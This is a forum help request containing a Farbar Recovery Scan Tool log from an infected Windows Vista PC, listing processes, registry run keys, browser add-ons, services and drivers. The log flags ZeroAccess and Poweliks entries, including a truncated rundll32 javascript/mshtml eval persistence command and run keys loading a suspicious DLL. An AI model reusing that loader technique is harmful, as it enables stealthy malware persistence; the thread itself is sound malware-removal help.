Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Another dlhost.exe 32* Problem


  • This topic is locked This topic is locked
12 replies to this topic

#1 mleehogg

mleehogg

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:24 AM

Posted 14 September 2014 - 10:29 AM

Like others, this is running lots of process' and crashing my computer. Here are my Farbar logs.

 

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 12-09-2014
Ran by Hogg (administrator) on HOGG-PC on 14-09-2014 09:22:02
Running from C:\Users\Hogg\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FOT92IOD
Platform: Windows Vista ™ Home Premium Service Pack 2 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
() C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.141\SSScheduler.exe
() C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe
(RealNetworks, Inc.) C:\Program Files (x86)\real\realplayer\Update\realsched.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Microsoft Corporation) C:\Windows\System32\mcbuilder.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [915512 2009-03-05] (Hewlett-Packard)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe [2640408 2014-08-25] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [TkBellExe] => c:\program files (x86)\real\realplayer\Update\realsched.exe [295512 2013-10-23] (RealNetworks, Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-09-01] (Apple Inc.)
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [1486144 2013-05-13] (IObit)
HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox]  ATTENTION! ====> ZeroAccess?
HKU\.DEFAULT\...\Run: [{C41A51F9-C162-4A86-AEA9-955929DA2DAE}] => rundll32 "C:\Users\Hogg\AppData\Local\{472011AB-211B-4DA4-8CDF-9AD275078570}\{C41A51F9-C162-4A86-AEA9-955929DA2DAE}\cgpgoheo.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-19\...\Run: [{C41A51F9-C162-4A86-AEA9-955929DA2DAE}] => rundll32 "C:\Users\Hogg\AppData\Local\{472011AB-211B-4DA4-8CDF-9AD275078570}\{C41A51F9-C162-4A86-AEA9-955929DA2DAE}\cgpgoheo.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [{C41A51F9-C162-4A86-AEA9-955929DA2DAE}] => rundll32 "C:\Users\Hogg\AppData\Local\{472011AB-211B-4DA4-8CDF-9AD275078570}\{C41A51F9-C162-4A86-AEA9-955929DA2DAE}\cgpgoheo.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-21-764796802-3477399101-373240229-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.141\SSScheduler.exe (McAfee, Inc.)
BootExecute: autocheck autochk * bootdelete

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?PC=msnHomeST&OCID=msnHomepage
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_us&c=93&bd=Pavilion&pf=cndt
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2406} URL = http://dts.search-results.com/sr?src=ieb&gct=ds&appid=394&systemid=406&apn_dtid=BND406&apn_ptnrs=AG6&o=APN10645&apn_uid=2492936740354564&q={searchTerms}
SearchScopes: HKLM - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPDTDF
SearchScopes: HKLM-x32 - DefaultScope {4591E5ED-D4E2-45E9-9618-6C9ABFE25973} URL =
SearchScopes: HKLM-x32 - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
SearchScopes: HKLM-x32 - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPDTDF
SearchScopes: HKLM-x32 - {FB144184-B500-42F4-9A1B-8A558CB28A3F} URL = http://dts.search-results.com/sr?src=ieb&gct=ds&appid=394&systemid=406&apn_dtid=BND406&apn_ptnrs=AG6&o=APN10645&apn_uid=2492936740354564&q={searchTerms}
SearchScopes: HKCU - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {4591E5ED-D4E2-45E9-9618-6C9ABFE25973} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3309350&CUI=UN22661023661384124&UM=2
SearchScopes: HKCU - {B237E68D-B139-4E1C-9631-FE577DBCC43D} URL =
SearchScopes: HKCU - {B906CA8F-1CE6-4F1E-9138-E48432C0DC4B} URL =
SearchScopes: HKCU - {FB144184-B500-42F4-9A1B-8A558CB28A3F} URL =
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.141\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO-x32: PasswordBox Helper -> {5DB69B97-934B-451D-94DB-32EF802A01CD} -> C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: AVG SafeGuard toolbar -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> C:\Program Files (x86)\AVG SafeGuard toolbar\18.1.9.799\AVG SafeGuard toolbar_toolbar.dll (AVG Secure Search)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0552.0\msneshellx.dll (Microsoft Corp.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - AVG SafeGuard toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files (x86)\AVG SafeGuard toolbar\18.1.9.799\AVG SafeGuard toolbar_toolbar.dll (AVG Secure Search)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {5B291E6C-9A74-4034-971B-A4B007A0B315} -  No File
Toolbar: HKCU - No Name - {B7DE27CA-0626-478A-95D6-6C0804782455} -  No File
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: HKLM-x32 {1851174C-97BD-4217-A0CC-E908F60D5B7A} http://h20364.www2.hp.com/CSMWeb/Customer/cabs/HPISDataManager.CAB
DPF: HKLM-x32 {20A60F0D-9AFA-4515-A0FD-83BD84642501} http://messenger.zone.msn.com/binary/msgrchkr.cab56986.cab
DPF: HKLM-x32 {5D6F45B3-9043-443D-A792-115447494D24} http://messenger.zone.msn.com/MessengerGamesContent/GameContent/Default/uno1/GAME_UNO1.cab
DPF: HKLM-x32 {6F15128C-E66A-490C-B848-5000B5ABEEAC} https://h20436.www2.hp.com/ediags/dex/secure/HPDEXAXO.cab
DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} http://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab
DPF: HKLM-x32 {8100D56A-5661-482C-BEE8-AFECE305D968} http://upload.facebook.com/controls/2009.07.28_v5.5.8.1/FacebookPhotoUploader55.cab
DPF: HKLM-x32 {C3F79A2B-B9B4-4A66-B012-3EE46475B072} http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 05 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5-x64 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5-x64 05 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

FireFox:
========
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin-x32: @checkpoint.com/FFApi -> C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker\bin\npFFApi.dll No File
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/DTPlugin,version=1.6.0_38 -> C:\Windows\SysWOW64\npdeployJava1.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.141\npMcAfeeMss.dll (McAfee, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin-x32: @pack.google.com/Google Updater;version=13 -> C:\Program Files (x86)\Google\Google Updater\2.4.1636.7222\npCIDetect13.dll (Google)
FF Plugin-x32: @real.com/nppl3260;version=16.0.3.51 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=16.0.3.51 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\Hogg\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF Extension: Define Ext - C:\Program Files (x86)\Mozilla Firefox\extensions\umylsm@sqhjcpzmeselzlp.org [2013-08-19]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-07]
FF HKLM-x32\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn
FF HKLM-x32\...\Firefox\Extensions: [{97E22097-9A2F-45b1-8DAF-36AD648C7EF4}] - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2013-01-12]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-10-23]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\coFFPlgn [2014-09-14]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\IPSFF [2013-10-09]
FF HKLM-x32\...\Firefox\Extensions: [{FFB96CC1-7EB3-449D-B827-DB661701C6BB}] - C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker
FF HKLM-x32\...\Firefox\Extensions: [avg@toolbar] - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\17.3.0.49
FF Extension: AVG SafeGuard toolbar - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\17.3.0.49 [2014-01-10]
FF HKLM-x32\...\Firefox\Extensions: [{DF153AFF-6948-45d7-AC98-4FC4AF8A08E2}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2

Chrome:
=======
Error reading preferences. Please check "preferences" file for possible corruption. <======= ATTENTION
CHR Profile: C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Norton Identity Protection) - C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Extensions\bejnhdlplbjhffionohbdnpcbobfejcc [2014-06-20]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-29]
CHR Extension: (Google Wallet) - C:\Users\Hogg\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-10]
CHR HKCU\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]
CHR HKLM-x32\...\Chrome\Extension: [bejnhdlplbjhffionohbdnpcbobfejcc] - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\Exts\Chrome.crx [2014-05-01]
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-08-14]
CHR HKLM-x32\...\Chrome\Extension: [iigplimlmgilpobjilfbfeilnpiigpgl] - C:\Users\Hogg\AppData\Local\CRE\iigplimlmgilpobjilfbfeilnpiigpgl.crx [2013-08-15]
CHR HKLM-x32\...\Chrome\Extension: [ogccgbmabaphcakpiclgcnmcnimhokcj] - C:\Windows\SysWOW64\jmdp\SweetNT.crx [2013-08-15]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S4 DTSRVC; C:\Program Files (x86)\Common Files\Portrait Displays\Shared\DTSRVC.exe [69632 2008-06-24] () [File not signed]
R2 ezSharedSvc; C:\Windows\SysWOW64\ezsvc7.dll [129992 2008-02-03] (EasyBits Sofware AS) [File not signed]
S4 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [651720 2009-08-06] (Macrovision Europe Ltd.) [File not signed]
S2 gupdate1ca1c3cefd8b09c; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [133104 2009-08-13] (Google Inc.)
S4 HP Health Check Service; c:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe [94208 2008-12-04] (Hewlett-Packard) [File not signed]
S4 HPBtnSrv; C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [192512 2008-09-30] () [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [906752 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S4 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [335168 2013-04-25] (IObit)
S4 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-03-17] (Hewlett-Packard Company) [File not signed]
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.141\McCHSvc.exe [289256 2014-01-15] (McAfee, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-07-18] (Hewlett-Packard) [File not signed]
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe [144368 2013-05-20] (Symantec Corporation)
R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-08-14] ()
S4 sprtsvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\sprtsvc.exe [206120 2010-06-17] (SupportSoft, Inc.)
S4 tgsrvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\tgsrvc.exe [185640 2010-06-17] (SupportSoft, Inc.)
R2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-11] (AVG Secure Search)
S2 RoxLiveShare9; No ImagePath

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 ASPI; C:\Windows\SysWOW64\DRIVERS\ASPI32.sys [84832 2002-07-17] (Adaptec) [File not signed]
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-08-11] (AVG Technologies)
R1 BHDrvx64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\BASHDefs\20140821.007\BHDrvx64.sys [1588016 2014-08-18] (Symantec Corporation)
R1 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1405000.01C\ccSetx64.sys [169048 2013-04-15] (Symantec Corporation)
S3 cpuz132; No ImagePath
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
S4 FileMonitor; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\wlh_amd64\FileMonitor.sys [23048 2013-03-23] (IObit)
S3 hitmanpro36; C:\Windows\system32\drivers\hitmanpro36.sys [30496 2012-09-06] ()
R1 IDSVia64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\IPSDefs\20140912.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-09-14] (Malwarebytes Corporation)
R3 NAVENG; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\VirusDefs\20140912.023\ENG64.SYS [129752 2014-09-11] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\VirusDefs\20140912.023\EX64.SYS [2137304 2014-09-11] (Symantec Corporation)
R3 PdiPorts; C:\Windows\System32\DRIVERS\PdiPorts.sys [20592 2009-06-23] (Portrait Displays, Inc.)
R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\wlh_amd64\regfilter.sys [34336 2013-03-26] (IObit.com)
S3 RimUsb; No ImagePath
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [31744 2009-01-09] (Research in Motion Ltd)
S1 SASDIFSV; No ImagePath
S3 SASENUM; No ImagePath
S1 SASKUTIL; No ImagePath
R1 SRTSP; C:\Windows\System32\Drivers\NISx64\1405000.01C\SRTSP64.SYS [796760 2013-05-15] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NISx64\1405000.01C\SRTSPX64.SYS [36952 2013-03-04] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\NISx64\1405000.01C\SYMDS64.SYS [493656 2013-05-20] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\NISx64\1405000.01C\SYMEFA64.SYS [1139800 2013-05-22] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177312 2013-06-12] (Symantec Corporation)
